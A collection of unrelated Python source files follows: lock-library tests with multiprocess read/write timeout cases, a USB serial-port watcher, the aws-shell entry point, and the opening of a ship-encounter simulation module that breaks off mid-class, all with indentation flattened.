subcomm.Free()
comm.Barrier() # barrier after each MPI test.
"""``multiproc_test()`` should be called by tests below.
``multiproc_test()`` will work for either MPI runs or for local runs.
"""
multiproc_test = mpi_multiproc_test if mpi else local_multiproc_test
#
# Process snippets below can be composed into tests.
#
def acquire_write(lock_path, start=0, length=0):
def fn(barrier):
lock = lk.Lock(lock_path, start, length)
lock.acquire_write() # grab exclusive lock
barrier.wait()
barrier.wait() # hold the lock until timeout in other procs.
return fn
def acquire_read(lock_path, start=0, length=0):
def fn(barrier):
lock = lk.Lock(lock_path, start, length)
lock.acquire_read() # grab shared lock
barrier.wait()
barrier.wait() # hold the lock until timeout in other procs.
return fn
def timeout_write(lock_path, start=0, length=0):
def fn(barrier):
lock = lk.Lock(lock_path, start, length)
barrier.wait() # wait for lock acquire in first process
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
barrier.wait()
return fn
def timeout_read(lock_path, start=0, length=0):
def fn(barrier):
lock = lk.Lock(lock_path, start, length)
barrier.wait() # wait for lock acquire in first process
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait()
return fn
#
# Test that exclusive locks on other processes time out when an
# exclusive lock is held.
#
def test_write_lock_timeout_on_write(lock_path):
multiproc_test(
acquire_write(lock_path),
timeout_write(lock_path))
def test_write_lock_timeout_on_write_2(lock_path):
multiproc_test(
acquire_write(lock_path),
timeout_write(lock_path),
timeout_write(lock_path))
def test_write_lock_timeout_on_write_3(lock_path):
multiproc_test(
acquire_write(lock_path),
timeout_write(lock_path),
timeout_write(lock_path),
timeout_write(lock_path))
def test_write_lock_timeout_on_write_ranges(lock_path):
multiproc_test(
acquire_write(lock_path, 0, 1),
timeout_write(lock_path, 0, 1))
def test_write_lock_timeout_on_write_ranges_2(lock_path):
multiproc_test(
acquire_write(lock_path, 0, 64),
acquire_write(lock_path, 65, 1),
timeout_write(lock_path, 0, 1),
timeout_write(lock_path, 63, 1))
def test_write_lock_timeout_on_write_ranges_3(lock_path):
multiproc_test(
acquire_write(lock_path, 0, 1),
acquire_write(lock_path, 1, 1),
timeout_write(lock_path),
timeout_write(lock_path),
timeout_write(lock_path))
def test_write_lock_timeout_on_write_ranges_4(lock_path):
multiproc_test(
acquire_write(lock_path, 0, 1),
acquire_write(lock_path, 1, 1),
acquire_write(lock_path, 2, 456),
acquire_write(lock_path, 500, 64),
timeout_write(lock_path),
timeout_write(lock_path),
timeout_write(lock_path))
#
# Test that shared locks on other processes time out when an
# exclusive lock is held.
#
def test_read_lock_timeout_on_write(lock_path):
multiproc_test(
acquire_write(lock_path),
timeout_read(lock_path))
def test_read_lock_timeout_on_write_2(lock_path):
multiproc_test(
acquire_write(lock_path),
timeout_read(lock_path),
timeout_read(lock_path))
def test_read_lock_timeout_on_write_3(lock_path):
multiproc_test(
acquire_write(lock_path),
timeout_read(lock_path),
timeout_read(lock_path),
timeout_read(lock_path))
def test_read_lock_timeout_on_write_ranges(lock_path):
"""small write lock, read whole file."""
multiproc_test(
acquire_write(lock_path, 0, 1),
timeout_read(lock_path))
def test_read_lock_timeout_on_write_ranges_2(lock_path):
"""small write lock, small read lock"""
multiproc_test(
acquire_write(lock_path, 0, 1),
timeout_read(lock_path, 0, 1))
def test_read_lock_timeout_on_write_ranges_3(lock_path):
"""two write locks, overlapping read locks"""
multiproc_test(
acquire_write(lock_path, 0, 1),
acquire_write(lock_path, 64, 128),
timeout_read(lock_path, 0, 1),
timeout_read(lock_path, 128, 256))
#
# Test that exclusive locks time out when shared locks are held.
#
def test_write_lock_timeout_on_read(lock_path):
multiproc_test(
acquire_read(lock_path),
timeout_write(lock_path))
def test_write_lock_timeout_on_read_2(lock_path):
multiproc_test(
acquire_read(lock_path),
timeout_write(lock_path),
timeout_write(lock_path))
def test_write_lock_timeout_on_read_3(lock_path):
multiproc_test(
acquire_read(lock_path),
timeout_write(lock_path),
timeout_write(lock_path),
timeout_write(lock_path))
def test_write_lock_timeout_on_read_ranges(lock_path):
multiproc_test(
acquire_read(lock_path, 0, 1),
timeout_write(lock_path))
def test_write_lock_timeout_on_read_ranges_2(lock_path):
multiproc_test(
acquire_read(lock_path, 0, 1),
timeout_write(lock_path, 0, 1))
def test_write_lock_timeout_on_read_ranges_3(lock_path):
multiproc_test(
acquire_read(lock_path, 0, 1),
acquire_read(lock_path, 10, 1),
timeout_write(lock_path, 0, 1),
timeout_write(lock_path, 10, 1))
def test_write_lock_timeout_on_read_ranges_4(lock_path):
multiproc_test(
acquire_read(lock_path, 0, 64),
timeout_write(lock_path, 10, 1),
timeout_write(lock_path, 32, 1))
def test_write_lock_timeout_on_read_ranges_5(lock_path):
multiproc_test(
acquire_read(lock_path, 64, 128),
timeout_write(lock_path, 65, 1),
timeout_write(lock_path, 127, 1),
timeout_write(lock_path, 90, 10))
#
# Test that exclusive locks time while lots of shared locks are held.
#
def test_write_lock_timeout_with_multiple_readers_2_1(lock_path):
multiproc_test(
acquire_read(lock_path),
acquire_read(lock_path),
timeout_write(lock_path))
def test_write_lock_timeout_with_multiple_readers_2_2(lock_path):
multiproc_test(
acquire_read(lock_path),
acquire_read(lock_path),
timeout_write(lock_path),
timeout_write(lock_path))
def test_write_lock_timeout_with_multiple_readers_3_1(lock_path):
multiproc_test(
acquire_read(lock_path),
acquire_read(lock_path),
acquire_read(lock_path),
timeout_write(lock_path))
def test_write_lock_timeout_with_multiple_readers_3_2(lock_path):
multiproc_test(
acquire_read(lock_path),
acquire_read(lock_path),
acquire_read(lock_path),
timeout_write(lock_path),
timeout_write(lock_path))
def test_write_lock_timeout_with_multiple_readers_2_1_ranges(lock_path):
multiproc_test(
acquire_read(lock_path, 0, 10),
acquire_read(lock_path, 0.5, 10),
timeout_write(lock_path, 5, 5))
def test_write_lock_timeout_with_multiple_readers_2_3_ranges(lock_path):
multiproc_test(
acquire_read(lock_path, 0, 10),
acquire_read(lock_path, 5, 15),
timeout_write(lock_path, 0, 1),
timeout_write(lock_path, 11, 3),
timeout_write(lock_path, 7, 1))
def test_write_lock_timeout_with_multiple_readers_3_1_ranges(lock_path):
multiproc_test(
acquire_read(lock_path, 0, 5),
acquire_read(lock_path, 5, 5),
acquire_read(lock_path, 10, 5),
timeout_write(lock_path, 0, 15))
def test_write_lock_timeout_with_multiple_readers_3_2_ranges(lock_path):
multiproc_test(
acquire_read(lock_path, 0, 5),
acquire_read(lock_path, 5, 5),
acquire_read(lock_path, 10, 5),
timeout_write(lock_path, 3, 10),
timeout_write(lock_path, 5, 1))
@pytest.mark.skipif(os.getuid() == 0, reason='user is root')
def test_read_lock_on_read_only_lockfile(lock_dir, lock_path):
"""read-only directory, read-only lockfile."""
touch(lock_path)
with read_only(lock_path, lock_dir):
lock = lk.Lock(lock_path)
with lk.ReadTransaction(lock):
pass
with pytest.raises(lk.LockROFileError):
with lk.WriteTransaction(lock):
pass
def test_read_lock_read_only_dir_writable_lockfile(lock_dir, lock_path):
"""read-only directory, writable lockfile."""
touch(lock_path)
with read_only(lock_dir):
lock = lk.Lock(lock_path)
with lk.ReadTransaction(lock):
pass
with lk.WriteTransaction(lock):
pass
@pytest.mark.skipif(os.getuid() == 0, reason='user is root')
def test_read_lock_no_lockfile(lock_dir, lock_path):
"""read-only directory, no lockfile (so can't create)."""
with read_only(lock_dir):
lock = lk.Lock(lock_path)
with pytest.raises(lk.CantCreateLockError):
with lk.ReadTransaction(lock):
pass
with pytest.raises(lk.CantCreateLockError):
with lk.WriteTransaction(lock):
pass
def test_upgrade_read_to_write(private_lock_path):
"""Test that a read lock can be upgraded to a write lock.
Note that to upgrade a read lock to a write lock, you have the be the
only holder of a read lock. Client code needs to coordinate that for
shared locks. For this test, we use a private lock just to test that an
upgrade is possible.
"""
# ensure lock file exists the first time, so we open it read-only
# to begin wtih.
touch(private_lock_path)
lock = lk.Lock(private_lock_path)
assert lock._reads == 0
assert lock._writes == 0
lock.acquire_read()
assert lock._reads == 1
assert lock._writes == 0
assert lock._file.mode == 'r+'
lock.acquire_write()
assert lock._reads == 1
assert lock._writes == 1
assert lock._file.mode == 'r+'
lock.release_write()
assert lock._reads == 1
assert lock._writes == 0
assert lock._file.mode == 'r+'
lock.release_read()
assert lock._reads == 0
assert lock._writes == 0
assert lock._file is None
def test_upgrade_read_to_write_fails_with_readonly_file(private_lock_path):
"""Test that read-only file can be read-locked but not write-locked."""
# ensure lock file exists the first time
touch(private_lock_path)
# open it read-only to begin wtih.
with read_only(private_lock_path):
lock = lk.Lock(private_lock_path)
assert lock._reads == 0
assert lock._writes == 0
lock.acquire_read()
assert lock._reads == 1
assert lock._writes == 0
assert lock._file.mode == 'r'
# upgrade to writ here
with pytest.raises(lk.LockROFileError):
lock.acquire_write()
#
# Longer test case that ensures locks are reusable. Ordering is
# enforced by barriers throughout -- steps are shown with numbers.
#
def test_complex_acquire_and_release_chain(lock_path):
def p1(barrier):
lock = lk.Lock(lock_path)
lock.acquire_write()
barrier.wait() # ---------------------------------------- 1
# others test timeout
barrier.wait() # ---------------------------------------- 2
lock.release_write() # release and others acquire read
barrier.wait() # ---------------------------------------- 3
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
lock.acquire_read()
barrier.wait() # ---------------------------------------- 4
lock.release_read()
barrier.wait() # ---------------------------------------- 5
# p2 upgrades read to write
barrier.wait() # ---------------------------------------- 6
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 7
# p2 releases write and read
barrier.wait() # ---------------------------------------- 8
# p3 acquires read
barrier.wait() # ---------------------------------------- 9
# p3 upgrades read to write
barrier.wait() # ---------------------------------------- 10
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 11
# p3 releases locks
barrier.wait() # ---------------------------------------- 12
lock.acquire_read()
barrier.wait() # ---------------------------------------- 13
lock.release_read()
def p2(barrier):
lock = lk.Lock(lock_path)
# p1 acquires write
barrier.wait() # ---------------------------------------- 1
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 2
lock.acquire_read()
barrier.wait() # ---------------------------------------- 3
# p1 tests shared read
barrier.wait() # ---------------------------------------- 4
# others release reads
barrier.wait() # ---------------------------------------- 5
lock.acquire_write() # upgrade read to write
barrier.wait() # ---------------------------------------- 6
# others test timeout
barrier.wait() # ---------------------------------------- 7
lock.release_write() # release read AND write (need both)
lock.release_read()
barrier.wait() # ---------------------------------------- 8
# p3 acquires read
barrier.wait() # ---------------------------------------- 9
# p3 upgrades read to write
barrier.wait() # ---------------------------------------- 10
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 11
# p3 releases locks
barrier.wait() # ---------------------------------------- 12
lock.acquire_read()
barrier.wait() # ---------------------------------------- 13
lock.release_read()
def p3(barrier):
lock = lk.Lock(lock_path)
# p1 acquires write
barrier.wait() # ---------------------------------------- 1
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 2
lock.acquire_read()
barrier.wait() # ---------------------------------------- 3
# p1 tests shared read
barrier.wait() # ---------------------------------------- 4
lock.release_read()
barrier.wait() # ---------------------------------------- 5
# p2 upgrades read to write
barrier.wait() # ---------------------------------------- 6
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 7
# p2 releases write & read
barrier.wait() # ---------------------------------------- 8
lock.acquire_read()
barrier.wait() # ---------------------------------------- 9
lock.acquire_write()
barrier.wait() # ---------------------------------------- 10
# others test timeout
barrier.wait() # ---------------------------------------- 11
lock.release_read() # release read AND write in opposite
lock.release_write() # order from before on p2
barrier.wait() # ---------------------------------------- 12
lock.acquire_read()
barrier.wait() # ---------------------------------------- 13
lock.release_read()
multiproc_test(p1, p2, p3)
class AssertLock(lk.Lock):
"""Test lock class that marks acquire/release events."""
def __init__(self, lock_path, vals):
super(AssertLock, self).__init__(lock_path)
self.vals = vals
# assert hooks for subclasses
assert_acquire_read = lambda self: None
assert_acquire_write = lambda self: None
assert_release_read = lambda self: None
assert_release_write = lambda self: None
def acquire_read(self, timeout=None):
self.assert_acquire_read()
result = super(AssertLock, self).acquire_read(timeout)
self.vals['acquired_read'] = True
return result
def acquire_write(self, timeout=None):
self.assert_acquire_write()
result = super(AssertLock, self).acquire_write(timeout)
self.vals['acquired_write'] = True
return result
def release_read(self, release_fn=None):
self.assert_release_read()
result = super(AssertLock, self).release_read(release_fn)
self.vals['released_read'] = True
return result
def release_write(self, release_fn=None):
self.assert_release_write()
result = super(AssertLock, self).release_write(release_fn)
self.vals['released_write'] = True
return result
@pytest.mark.parametrize(
"transaction,type",
[(lk.ReadTransaction, "read"), (lk.WriteTransaction, "write")]
)
def test_transaction(lock_path, transaction, type):
class MockLock(AssertLock):
def assert_acquire_read(self):
assert not vals['entered_fn']
assert not vals['exited_fn']
def assert_release_read(self):
assert vals['entered_fn']
assert not vals['exited_fn']
def assert_acquire_write(self):
assert not vals['entered_fn']
assert not vals['exited_fn']
def assert_release_write(self):
assert vals['entered_fn']
assert not vals['exited_fn']
def enter_fn():
# assert enter_fn is called while lock is held
assert vals['acquired_%s' % type]
vals['entered_fn'] = True
def exit_fn(t, v, tb):
# assert exit_fn is called while lock is held
assert not vals['released_%s' % type]
vals['exited_fn'] = True
vals['exception'] = (t or v or tb)
vals = collections.defaultdict(lambda: False)
lock = MockLock(lock_path, vals)
with transaction(lock, acquire=enter_fn, release=exit_fn):
assert vals['acquired_%s' % type]
assert not vals['released_%s' % type]
assert vals['entered_fn']
assert vals['exited_fn']
assert vals['acquired_%s' % type]
assert vals['released_%s' % type]
assert not vals['exception']
@pytest.mark.parametrize(
"transaction,type",
[(lk.ReadTransaction, "read"), (lk.WriteTransaction, "write")]
)
def test_transaction_with_exception(lock_path, transaction, type):
class MockLock(AssertLock):
def assert_acquire_read(self):
assert not vals['entered_fn']
assert not vals['exited_fn']
def assert_release_read(self):
assert vals['entered_fn']
assert not vals['exited_fn']
def assert_acquire_write(self):
assert not vals['entered_fn']
assert not vals['exited_fn']
def assert_release_write(self):
assert vals['entered_fn']
assert not vals['exited_fn']
def enter_fn():
assert vals['acquired_%s' % type]
vals['entered_fn'] = True
def exit_fn(t, v, tb):
assert not vals['released_%s' % type]
vals['exited_fn'] = True
vals['exception'] = (t or v or tb)
return exit_result
exit_result = False
vals = collections.defaultdict(lambda: False)
lock = MockLock(lock_path, vals)
with pytest.raises(Exception):
with transaction(lock, acquire=enter_fn, release=exit_fn):
raise Exception()
assert vals['entered_fn']
assert vals['exited_fn']
assert vals['exception']
# test suppression of exceptions from exit_fn
exit_result = True
vals.clear()
# should not raise now.
with transaction(lock, acquire=enter_fn, release=exit_fn):
raise Exception()
assert vals['entered_fn']
assert vals['exited_fn']
assert vals['exception']
@pytest.mark.parametrize(
"transaction,type",
[(lk.ReadTransaction, "read"), (lk.WriteTransaction, "write")]
)
def test_transaction_with_context_manager(lock_path, transaction, type):
class MockLock(AssertLock):
def assert_acquire_read(self):
assert not vals['entered_ctx']
assert not vals['exited_ctx']
def assert_release_read(self):
assert vals['entered_ctx']
assert vals['exited_ctx']
def assert_acquire_write(self):
assert not vals['entered_ctx']
assert not vals['exited_ctx']
def assert_release_write(self):
assert vals['entered_ctx']
assert vals['exited_ctx']
class TestContextManager(object):
def __enter__(self):
vals['entered_ctx'] = True
def __exit__(self, t, v, tb):
assert not vals['released_%s' % type]
vals['exited_ctx'] = True
vals['exception_ctx'] = (t or v or tb)
return exit_ctx_result
def exit_fn(t, v, tb):
assert not vals['released_%s' % type]
vals['exited_fn'] = True
vals['exception_fn'] = (t or v or tb)
return exit_fn_result
exit_fn_result, exit_ctx_result = False, False
vals = collections.defaultdict(lambda: False)
lock = MockLock(lock_path, vals)
with transaction(lock, acquire=TestContextManager, release=exit_fn):
pass
assert vals['entered_ctx']
assert vals['exited_ctx']
assert vals['exited_fn']
assert not vals['exception_ctx']
assert not vals['exception_fn']
vals.clear()
with transaction(lock, acquire=TestContextManager):
pass
assert vals['entered_ctx']
assert vals['exited_ctx']
assert not vals['exited_fn']
assert not vals['exception_ctx']
assert not vals['exception_fn']
# below are tests for exceptions with and without suppression
def assert_ctx_and_fn_exception(raises=True):
vals.clear()
if raises:
with pytest.raises(Exception):
with transaction(
lock, acquire=TestContextManager, release=exit_fn):
raise Exception()
else:
with transaction(
lock, acquire=TestContextManager, release=exit_fn):
raise Exception()
assert vals['entered_ctx']
assert vals['exited_ctx']
assert vals['exited_fn']
assert vals['exception_ctx']
assert vals['exception_fn']
def assert_only_ctx_exception(raises=True):
vals.clear()
if raises:
with pytest.raises(Exception):
with transaction(lock, acquire=TestContextManager):
raise Exception()
else:
with transaction(lock, acquire=TestContextManager):
raise Exception()
assert vals['entered_ctx']
assert vals['exited_ctx']
assert not vals['exited_fn']
assert vals['exception_ctx']
assert not vals['exception_fn']
# no suppression
assert_ctx_and_fn_exception(raises=True)
assert_only_ctx_exception(raises=True)
# suppress exception only in function
exit_fn_result, exit_ctx_result = True, False
assert_ctx_and_fn_exception(raises=False)
assert_only_ctx_exception(raises=True)
# suppress exception only in context
exit_fn_result, exit_ctx_result = False, True
assert_ctx_and_fn_exception(raises=False)
assert_only_ctx_exception(raises=False)
# suppress exception in function and context
exit_fn_result, exit_ctx_result = True, True
assert_ctx_and_fn_exception(raises=False)
assert_only_ctx_exception(raises=False)
def test_nested_write_transaction(lock_path):
"""Ensure that the outermost write transaction writes."""
def write(t, v, tb):
vals['wrote'] = True
vals = collections.defaultdict(lambda: False)
lock = AssertLock(lock_path, vals)
# write/write
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
assert not vals['wrote']
assert vals['wrote']
# read/write
vals.clear()
with lk.ReadTransaction(lock):
assert not vals['wrote']
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
assert vals['wrote']
# write/read/write
vals.clear()
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
with lk.ReadTransaction(lock):
assert not vals['wrote']
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
assert not vals['wrote']
assert not vals['wrote']
assert vals['wrote']
# read/write/read/write
vals.clear()
with lk.ReadTransaction(lock):
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
with lk.ReadTransaction(lock):
assert not vals['wrote']
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
assert not vals['wrote']
assert not vals['wrote']
assert vals['wrote']
def test_nested_reads(lock_path):
"""Ensure that write transactions won't re-read data."""
def read():
vals['read'] += 1
vals = collections.defaultdict(lambda: 0)
lock = AssertLock(lock_path, vals)
# read/read
vals.clear()
assert vals['read'] == 0
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
# write/write
vals.clear()
assert vals['read'] == 0
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
# read/write
vals.clear()
assert vals['read'] == 0
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
# write/read/write
vals.clear()
assert vals['read'] == 0
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
# read/write/read/write
vals.clear()
assert vals['read'] == 0
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
def test_lock_debug_output(lock_path):
host = socket.getfqdn()
def p1(barrier, q1, q2):
# exchange pids
p1_pid = os.getpid()
q1.put(p1_pid)
p2_pid = q2.get()
# set up lock
lock = lk.Lock(lock_path, debug=True)
with lk.WriteTransaction(lock):
# p1 takes write lock and writes pid/host to file
barrier.wait() # ------------------------------------ 1
assert lock.pid == p1_pid
assert lock.host == host
# wait for p2 to verify contents of file
barrier.wait() # ---------------------------------------- 2
# wait for p2 to take a write lock
barrier.wait() # ---------------------------------------- 3
# verify pid/host info again
with lk.ReadTransaction(lock):
assert lock.old_pid == p1_pid
assert lock.old_host == host
assert lock.pid == p2_pid
assert lock.host == host
barrier.wait() # ---------------------------------------- 4
def p2(barrier, q1, q2):
# exchange pids
p2_pid = os.getpid()
p1_pid = q1.get()
q2.put(p2_pid)
# set up lock
lock = lk.Lock(lock_path, debug=True)
# p1 takes write lock and writes pid/host to file
barrier.wait() # ---------------------------------------- 1
# verify that p1 wrote information to lock file
with lk.ReadTransaction(lock):
assert lock.pid == p1_pid
assert lock.host == host
barrier.wait() # ---------------------------------------- 2
# take a write lock on the file and verify pid/host info
with lk.WriteTransaction(lock):
assert lock.old_pid == p1_pid
assert lock.old_host == host
assert lock.pid == p2_pid
assert lock.host == host
barrier.wait() # ------------------------------------ 3
# wait for p1 to verify pid/host info
barrier.wait() # ---------------------------------------- 4
q1, q2 = Queue(), Queue()
local_multiproc_test(p2, p1, extra_args=(q1, q2))
def test_lock_with_no_parent_directory(tmpdir):
"""Make sure locks work even when their parent directory does not exist."""
with tmpdir.as_cwd():
lock = lk.Lock('foo/bar/baz/lockfile')
with lk.WriteTransaction(lock):
pass
def test_lock_in_current_directory(tmpdir):
"""Make sure locks work even when their parent directory does not exist."""
with tmpdir.as_cwd():
# test we can create a lock in the current directory
lock = lk.Lock('lockfile')
for i in range(10):
with lk.ReadTransaction(lock):
pass
with lk.WriteTransaction(lock):
pass
# and that we can do the same thing after it's already there
lock = lk.Lock('lockfile')
for i in range(10):
with lk.ReadTransaction(lock):
pass
with lk.WriteTransaction(lock):
pass
|
usbportwatcher.py
|
##Loops in thread looking for usb devices on serial ports. Maintains a list of connected ports.
import os
import threading
import json
from time import sleep
from eventsmanager import EventsManager
class USBPortWatcher():
def __init__(self):
self.em = EventsManager()
self.connectedUSBPorts = []
self.watchUSB()
def getUSBPorts(self):
return self.connectedUSBPorts
def _watchUSB(self):
prev_usb_ports = []
while True:
# get list of usb ports with connections
if os.path.exists('/dev/'):
all_ports = os.listdir('/dev')
else:
all_ports = []
usb_ports = [port_name for port_name in all_ports if (port_name.startswith('ttyUSB') or port_name.startswith('ttyACM'))]
# look for new usb connections
for short_port_name in usb_ports:
if not short_port_name in prev_usb_ports:
port = '/dev/' + short_port_name
print("USBWatcher: New device found on port", port)
self.em.publish("usb-connect", {"port":port})
# look for usb disconnections
for short_port_name in prev_usb_ports:
if not short_port_name in usb_ports:
port = '/dev/' + short_port_name
print("USBWatcher: Device removed from port", port)
self.em.publish("usb-disconnect", {"port":port})
# save list for next pass around
prev_usb_ports = usb_ports
self.connectedUSBPorts = usb_ports
sleep(.2)
def watchUSB(self):
t = threading.Thread(target=self._watchUSB)
t.start()
|
__init__.py
|
from __future__ import unicode_literals, print_function
import json
import argparse
import threading
from awsshell import shellcomplete
from awsshell import autocomplete
from awsshell import app
from awsshell import docs
from awsshell import loaders
from awsshell.index import completion
from awsshell import utils
__version__ = '0.2.0'
def determine_doc_index_filename():
import awscli
base = loaders.JSONIndexLoader.index_filename(
awscli.__version__)
return base + '.docs'
def load_index(filename):
load = loaders.JSONIndexLoader()
return load.load_index(filename)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--profile', help='The profile name to use '
'when starting the AWS Shell.')
args = parser.parse_args()
indexer = completion.CompletionIndex()
try:
index_str = indexer.load_index(utils.AWSCLI_VERSION)
index_data = json.loads(index_str)
except completion.IndexLoadError:
print("First run, creating autocomplete index...")
from awsshell.makeindex import write_index
# TODO: Using internal method, but this will eventually
# be moved into the CompletionIndex class anyways.
index_file = indexer._filename_for_version(utils.AWSCLI_VERSION)
write_index(index_file)
index_str = indexer.load_index(utils.AWSCLI_VERSION)
index_data = json.loads(index_str)
doc_index_file = determine_doc_index_filename()
from awsshell.makeindex import write_doc_index
doc_data = docs.load_lazy_doc_index(doc_index_file)
# There's room for improvement here. If the docs didn't finish
# generating, we regen the whole doc index. Ideally we pick up
# from where we left off.
try:
docs.load_doc_db(doc_index_file)['__complete__']
except KeyError:
print("Creating doc index in the background. "
"It will be a few minutes before all documentation is "
"available.")
t = threading.Thread(target=write_doc_index, args=(doc_index_file,))
t.daemon = True
t.start()
model_completer = autocomplete.AWSCLIModelCompleter(index_data)
completer = shellcomplete.AWSShellCompleter(model_completer)
shell = app.create_aws_shell(completer, model_completer, doc_data)
if args.profile:
shell.profile = args.profile
shell.run()
if __name__ == '__main__':
main()
|
SimVM.py
|
#-------------------------------------------------------------------------------
# Name: SimVM
# Purpose: 实现一个线程安全仿真环境,其中包含多条自主航行船舶、观测者、环境数据
#
# Author: Youan
# Helper: Bruce
# Created: 27-01-2020
# Copyright: (c) Youan 2020
# Licence: <your licence>
#-------------------------------------------------------------------------------
import math, random, time, copy, uuid, threading
import CPA, TransBCD, DrawVoAreas, opt_db, opt_redis
import HumanActivity as HA
class SimShip:
# 仿真船舶决策类,实现一步决策
def __init__(self, SimVMID, ShipID, Tick = 0, Lon = 0.0, Lat = 0.0, Speed = 0.0, Heading = 0.0, TimeRatio = 10):
# super().__init__(self, SimShipRegistered)
self.VMid = SimVMID # 所属虚拟机
self.id = ShipID #船舶的ID号码
self.lon = Lon #船舶经度坐标
self.lat = Lat #船舶纬度坐标
self.speed = Speed #船舶速度,m/s
self.heading = Heading #船艏向,°,正北方向为 0,顺时针旋转为正
self.interval = TimeRatio #一次离散步长所对应的时间间隔
self.tick = Tick #当前虚拟时钟
self.VOImgID = None
pass
def __RunOneStep(self):
# time.sleep(0.1)
# 创建一个以"__"双下划线开始的方法时,这意味着这个方法不能被重写,它只允许在该类的内部中使用
# 简单计算,详细有待航海学相关内容
# lon, lat: 起始坐标
# speed: 航速,待统一转换,初步单位为 m/s
# heading: 航向角,以正北为基准顺时针度量到航向线的角度
# distance:本周期内,船舶行走的距离长度,初步单位为米
# math.radians()将角度转换为弧度
# 返回值:新的坐标点
distance = self.speed * self.interval # 单位为米
# xx = self.lon + distance * math.sin(math.radians(self.heading))
# yy = self.lat + distance * math.cos(math.radians(self.heading))
x_com = distance * math.sin(math.radians(self.heading))
y_com = distance * math.cos(math.radians(self.heading))
xx = TransBCD.DeltaMeter2DeltaLon(x_com, self.lat)
yy = TransBCD.DeltaMeter2DeltaLat(y_com)
x = self.lon + xx
y = self.lat + yy
# heading, speed 不做出改变
# print(self.lon, self.lat, self.speed, self.heading, distance, xx, yy)
return x, y
def __TurnLeft(self):
# time.sleep(0.1)
distance = self.speed * self.interval # 单位为米
# xx = self.lon + distance * math.sin(math.radians(self.heading - 5))
# yy = self.lat + distance * math.cos(math.radians(self.heading - 5))
x_com = distance * math.sin(math.radians(self.heading - 10))
y_com = distance * math.cos(math.radians(self.heading - 10))
xx = TransBCD.DeltaMeter2DeltaLon(x_com, self.lat)
yy = TransBCD.DeltaMeter2DeltaLat(y_com)
x = self.lon + xx
y = self.lat + yy
# TODO: 调用船舶动力学模型计算船舶位置等状态信息
return x, y
pass
def __TurnRight(self):
# time.sleep(0.1)
distance = self.speed * self.interval # 单位为米
# xx = self.lon + distance * math.sin(math.radians(self.heading + 5))
# yy = self.lat + distance * math.cos(math.radians(self.heading + 5))
x_com = distance * math.sin(math.radians(self.heading + 10))
y_com = distance * math.cos(math.radians(self.heading + 10))
xx = TransBCD.DeltaMeter2DeltaLon(x_com, self.lat)
yy = TransBCD.DeltaMeter2DeltaLat(y_com)
x = self.lon + xx
y = self.lat + yy
# TODO: 调用船舶动力学模型计算船舶位置等状态信息
return x, y
pass
def DecitionCore(self, func):
self.lon, self.lat = func()
self.tick = self.tick + self.interval
def RunOneDecision(self, RunFlag):
if self.id == '10086': # 目前只有主船决策
if RunFlag == 2:
self.DecitionCore(self.__TurnLeft)
# print('\nFlag2 This Ship.time: ', self.tick)
# TODO: 之后是否要修正方向, 当前在转行函数中自动修正
elif RunFlag == 3:
self.DecitionCore(self.__TurnRight)
# TODO: 之后是否要修正方向, 当前在转行函数中自动修正
else:
self.DecitionCore(self.__RunOneStep)
else:
self.DecitionCore(self.__RunOneStep)
pass
def GetShipStatus(self):
shipStatus = {} # 创建一个空字典
shipStatus['time'] = self.tick
shipStatus['VMid'] = self.VMid
shipStatus['shipid'] = self.id
shipStatus['lon'] = self.lon
shipStatus['lat'] = self.lat
shipStatus['speed'] = self.speed
shipStatus['heading'] = self.heading
shipStatus['interval'] = self.interval
shipStatus['VOImgID'] = self.VOImgID
return shipStatus
class SimVM:
# SimShipRegistered = []
# __Times = 10
# __GoHead = True
# __RunFlag = 0 # 测试决策
# __METFlag = 0 # 标识是否已经相遇,相遇则此虚拟机停止运行
# __SimData = []
# __NextStepData = {}
def __init__(self, id, interval = 0.5, timeratio = 10):
# 定义虚拟机内船舶清单
# ShipStatus内存数据表,一台VM带一个
# 初始化参数 其中的私有变量可以改为公有
